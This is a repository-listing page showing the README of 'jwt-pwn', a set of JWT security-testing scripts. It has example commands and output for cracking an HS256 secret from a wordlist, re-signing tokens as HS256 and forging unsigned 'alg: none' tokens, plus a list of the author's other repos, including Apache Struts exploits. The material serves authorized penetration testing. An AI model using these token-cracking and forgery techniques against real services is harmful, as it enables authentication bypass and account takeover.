Top Rating
- Top Contributors
  Discover the Top Open Source contributors by country or by language
- Interviews
  Discover real stories from Open Source developers
Discover

Discover your Favorite Language
Discover the top trending repositories and projects on Github. Explore the latest trends in your preferred languages.

PowerShell

Nix

Erlang

Dart

HTML

Haskell

Solidity

Clojure

More Languages
Awesome

Awesome repositories
Discover the most awesome repositories and projects of your favorite languages. Inspired by the Awesome-* lists trend in GitHub.

Rust

F#

C#

PHP

Shell

Kotlin

JavaScript

Racket

More Languages
By Country

Rankings by Country
Discover the community of talented open source contributors in each country.

🇦🇩 Andorra

🇹🇩 Chad

🇲🇸 Montserrat

🇸🇿 Eswatini

🇰🇮 Kiribati

🇪🇨 Ecuador

🇧🇴 Bolivia

🇳🇴 Norway

All Countries Compare Countries

mazen160/jwt-pwn

Stars
288
Rank 143,818 (Top 3 %)
Language
Python
License
MIT License
Created about 5 years ago
Updated over 2 years ago

mazen160/jwt-pwn

mazen160

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Security Testing Scripts for JWT

jwt-pwn

Security Testing Scripts for JWT

jwt-cracker.py

JWT password/secret cracker.

$python3 jwt-cracker.py -jwt "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJqd3QiOiJwd24ifQ.4pOAm1W4SHUoOgSrc8D-J1YqLEv9ypAApz27nfYP5L4" -t 10 -w /pentest/wordlist.txt
[info] Loaded wordlist.
[info] starting brute-forcing.
[#] KEY FOUND: 1234

go-jwt-cracker

JWT password/secret cracker that is much faster.

$ cd go-jwt-cracker
$ go get
$ go build # Building the binary.

$ ./go-jwt-cracker -wordlist /pentest/wordlist.txt -token "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJqd3QiOiJwd24ifQ.4pOAm1W4SHUoOgSrc8D-J1YqLEv9ypAApz27nfYP5L4"
[+] Key Found: 1234

jwt-decoder.py

Decodes the value of JWT.

$ python3 jwt-decoder.py "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJqd3QiOiJwd24ifQ.4pOAm1W4SHUoOgSrc8D-J1
YqLEv9ypAApz27nfYP5L4"


[#] JWT Header:
{"alg": "HS256", "typ": "JWT"}

[#] JWT Value:
{"jwt": "pwn"}

jwt-any-to-hs256.py

Generates a new JWT that is signed with HS256 with the same payload value of a provided JWT.

python3 jwt-any-to-hs256.py "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJqd3QiOiJwd24ifQ.4pOAm1W4SHUoOgSrc
8D-J1YqLEv9ypAApz27nfYP5L4"


[#] Generated JWT:
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJqd3QiOiJwd24ifQ.WqY6R5zmscIx_6ZFwSASHZ_1zbqih_IdtLv_S2Pj028

jwt-mimicker.py

Generates a new unsigned JWT with the same payload value of a provided JWT.

python3 jwt-mimicker.py "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJqd3QiOiJwd24ifQ.4pOAm1W4SHUoOgSrc8D-J
1YqLEv9ypAApz27nfYP5L4"


[#] Generated unsigned JWT:
eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJqd3QiOiJwd24ifQ.

Requirements

Python2 or Python3
pyjwt

Legal Disclaimer

This project is made for educational and ethical testing purposes only. Usage of jwt-pwn for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.

License

The project is licensed under MIT License.

Author

Mazin Ahmed

Website: https://mazinahmed.net
Email: mazin AT mazinahmed DOT net
Twitter: https://twitter.com/mazen160
Linkedin: http://linkedin.com/in/infosecmazinahmed

secrets-patterns-db

Secrets Patterns DB: The largest open-source Database for detecting secrets, API keys, passwords, tokens, and more.

bfac

BFAC (Backup File Artifacts Checker): An automated tool that checks for backup artifacts that may disclose the web-application's source code.

Firefox-Security-Toolkit

A tool that transforms Firefox browsers into a penetration testing suite

shennina

Automating Host Exploitation with AI

struts-pwn

An exploit for Apache Struts CVE-2017-5638

server-status_PWN

A script that monitors and extracts requested URLs and clients connected to the service by exploiting publicly accessible Apache server-status instances.

GithubCloner

A script that clones Github repositories of users and organizations.

tfquery

tfquery: Run SQL queries on your Terraform infrastructure. Query resources and analyze its configuration using a SQL-powered framework.

xless

The Serverless Blind XSS App

struts-pwn_CVE-2018-11776

An exploit for Apache Struts CVE-2018-11776

struts-pwn_CVE-2017-9805

An exploit for Apache Struts CVE-2017-9805

public

go-random

🌐 go-random: A fast, clear, and cryptographically-secure random data generator for Golang

whatsapp-chat-parser

WhatsApp Chat Parser

Ubuntu-Desktop-Malware-Vector-Demo

Demo for http://blog.mazinahmed.net/2017/04/using-ubuntu-desktop-as-malware-vector.html

gronpy

Print JSON objects in a "Greppable" output.

trufflehog-clone

Trufflehog v2 Clone

juice-shop

mazinahmed.net

detect_passive_secrets